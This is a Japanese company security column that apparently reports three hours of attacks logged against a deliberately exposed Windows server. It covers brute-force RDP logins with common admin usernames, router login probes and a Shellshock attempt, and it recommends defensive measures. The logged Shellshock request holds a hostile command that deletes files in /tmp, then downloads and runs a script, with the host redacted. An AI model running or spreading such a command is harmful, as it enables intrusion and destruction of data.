KNOWLEDGE - COLUMN ナレッジ - コラム

【検証】不正アクセスをうけてみた

コラムイメージ

関連するソリューション

サイバーセキュリティ

ID-Ashura/セキュリティサービス


エバンジェリスト・フェロー 玉越 元啓 玉越写真_100x150 

はじめに

今回のテーマは、「不正アクセスを受けてみた」です。
政府系サービスや医療機関を対象とした攻撃のニュースを一般の報道でもよく見かけるようになりました。サーバを公開したときに受ける不正アクセスはどのようなものか、実際に受けてみました。

環境について

OS

今回実験に用意した環境は、Windows Server 2019 Datacenter 1809 Build 17763.3770 です。メインストリームのサポート期限が2024-01-09までと後1年に迫っており、更新対象として検討されている企業もありそうです。
https://learn.microsoft.com/en-us/windows-server/get-started/windows-server-release-info 外部サイト)
Windowsの仕様
また、OS標準のセキュリティは全てデフォルトの設定でONにしています。
Windowsの仕様
流石にノーガードとはいかないので、最新のパッチとデフォルトのセキュリティは導入した状態にしました。

NW

グローバルIPアドレスを取得して設定しました。FWは、ポート3389(RDP)、80(HTTP)、443(HTTPS)を開放しました。
3389はWindows リモート デスクトップおよびリモート アシスタンス接続に使用されます。Windows ターミナル サーバーでも使用されます。著名な攻撃としては、DoSによるサーバ機能の停止を狙ったものや(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0680 外部リンク)、RDPパケットに細工することで任意のコードを実行するもの(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2526 外部リンク)があります。

Webサーバ

ポート80/443は解放するだけでは意味がないので、簡易的なWebサービスを立ち上げて、どんなアクセスがあるか監視します。HTTPのリクエストがきたらステータスコードを返すだけの、何も出来ないWebサービスです。また、ドメイン名も取得し、DNS”のみ”に公開しました。”のみ”にというのは、IPアドレスとドメイン名の登録のみで、積極的な公開は一切行っていません。(なお、原稿公開時点では全て停止しております。)
参考:Webサーバのコード抜粋
参考:Webサーバのコード抜粋
さて、どんなアクセスがあるでしょうか?楽しみです。今回はログを監視する仕組みまで作りこんでいないので、時間を区切って目視で監視します。何かあったら抜線してシャットダウン(二度と起動しない)です。

今回受けたアタック

RDPへのアタック

3時間で118回のRDPへのアクセスがあり、管理者権限の取得を試みられました。下の画像は、VMADMINとうアカウントでログインの試行をされたものです。
サンプル
2回以上使われたID/アカウント(以下、ID)は下の表のとおりです。またIDのなかに、ADMINが含まれるものは71件と全体の60%を占めています。ランダムな文字列でのアクセスはなく、意味が推測できるIDでのアクセスがほとんどでした。
デフォルトのIDや入門書やチュートリアルで作成するIDは不正アクセスに使われがちです。従来から取られている対策の、デフォルトの管理者権限のIDを使わないこと、推測しやすいIDとパスワードを使用しないこと、は有効な手段だと感じました。
ID/アカウント 回数
AZUREUSER 16
ADMINISTRATOR 10
ADMINISTRADOR 6
AZUREADMIN 6
STUDENT 6
ADMINUSR 4
admin 3
asp.net 3
AZADMIN 3
new1 3
SUPERADMIN 3
SUPERUSER 3
AZUSER 2
ITADMIN 2
SYSADMIN 2
VMADMIN 2
アクセス元のIPは10か所に分かれており、各々から10回以上のアクセスがありました。IPアドレスを巡回し、生きているアドレスが見つかったら、IDとパスワードを組み合わせた辞書をつかって、サーバにログインできないか試行していると考えています。
アタックの回数に比べて同じIDがあまり使われていない理由は、試行の方法にあります。同じIDでパスワードを何回か間違えるとアカウントをロックする仕組みは導入されていると思います。そこで、アタックする際はパスワードを固定しIDを変えてログインできないか試行しているのです。

Webサーバへのアタック

Webサーバへのアタックは3時間で31件ありました。内訳は下の表になります。気になったアクセスについていくつかピックアップします。
分類 データの個
脆弱性へのアタック 3
HTTPSによる / へのアクセス 8
POSTリクエスト 3
HTTPによる / へのアクセス 17
合計 31
・「HTTPによるアクセス」「HTTPSによるアクセス」
ブラウザのURL欄に「HTTP(S)://ドメイン名/~」といれてアクセスした際に発生するものです。今回はWebサーバの立ち上げを公開していないので、サーバが存在することが判明した時点か、「HTTP(S)://IPアドレス」を決め打ちでアクセスしていると思われます。

「~」の部分は、特に指定せずにルートへのアクセスするものが大半でした。指定しているものの中では、ネットワーク機器のログイン画面を探すものが目立ちました。例えばルーターの管理画面のURLはメーカや機種で決まっているものが多く、デフォルトの管理者アカウントIDも容易に知ることができます。
 
・POSTリクエスト
今回は下のようなアクセスがありました。
xxx.xxx.221.42 - -  "POST /boaform/admin/formLogin HTTP/1.1" 404 -
URLから、ルータの管理画面を狙った攻撃と推測します。/boaformだとnetlink系の機器でしょうか。特権アクセスを取得するために使用される攻撃で、応答するものを見つけるまで、できるだけ多くの異なる IP アドレスにアクセスするツール(特に、ボットと呼ばれます)によるものと思われます。
サーバだけ守ればよいのではなく、FWやルータなどのNW機器類も忘れず防御する必要性を実感しました。
 
・脆弱性へのアタック
分かりやすい攻撃の例として次のログを取り上げます。
xxx.xxx.234.113 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+■■■■■;sh+■ HTTP/1.1" 404 -
これは2014年9月24日に公開された、shellshockと呼ばれる脆弱性を攻撃するものです(参考https://en.wikipedia.org/wiki/Shellshock_(software_bug))。Unix系OSのシェルに任意のコードを実行させるもので、特定のサイトからスクリプトをダウンロードして実行させようとするものでした。既知の脆弱性かつパッチも公開されているもので、脆弱性の情報を収集して対応することの重要性を感じました。

他、各種クラウドベンダーが提供しているチュートリアルで作成するWebページのログイン画面を狙ったものがありました。ログインページのURLやアカウントの設定などデフォルトのままのことが多く、狙いやすいのでしょう。最近のチュートリアルでは最後に作成したサービスを停止するところまでカリキュラムに含めるものが増えてきたようです。

まとめ

実際に攻撃をみて感じたことは、
  • ID/パスワードを利用した不正アクセスは頻繁に行われている。インターネットにつないだ時点から1分に1回はアタックを受けていると思っていい。
  • OSだけでなくNW機器含めたシステム全体の防御に加えて、不正アクセスを検知する仕組みも重要。「何も起きていないこと」に価値があることを再認識した。
  • 既知の脆弱性を利用した攻撃も続けられている。最新のパッチをあてることが大切。
ということです。
他にも、未知の脆弱性を利用した攻撃やゼロデイアタック(脆弱性が発表されてからパッチが配布されるまでの間に攻撃する)に対する対応も必要になりそうです。
不正アクセスの方法も日々増え続けおり、セキュリティ対策は、機器の監視だけでなく、利用する人のトレーニングや有事の際の対応計画など、考慮すべき対象が多岐にわたります。
下のリンクは、ID社のセキュリティサービスの紹介ですが、考慮すべき項目・考え方・図解などよくまとまっており、参考資料としてご利用ください。
 
ID-Ashura IDセキュリティブランドシリーズ | インフォメーション・ディベロプメント (idnet.co.jp)
https://www.idnet.co.jp/service/id-ashura.html

当サイトの内容、テキスト、画像等の転載・転記・使用する場合は問い合わせよりご連絡下さい。

エバンジェリストによるコラムやIDグループからのお知らせなどを
メルマガでお届けしています。

メルマガ登録ボタン


玉越 元啓

株式会社インフォメーション・ディベロプメント フェロー

この執筆者の記事一覧

関連するソリューション

サイバーセキュリティ

ID-Ashura/セキュリティサービス

関連するナレッジ・コラム

重要経済安保情報の保護及び活用に関する法律案 -日本を守るセキュリティクリアランス

ITエンジニアの現地作業 ミスを減らす!作業本番のポイントとは

情報セキュリティ教育とは?その必要性や学習テーマ事例、実施時のポイントなどを解説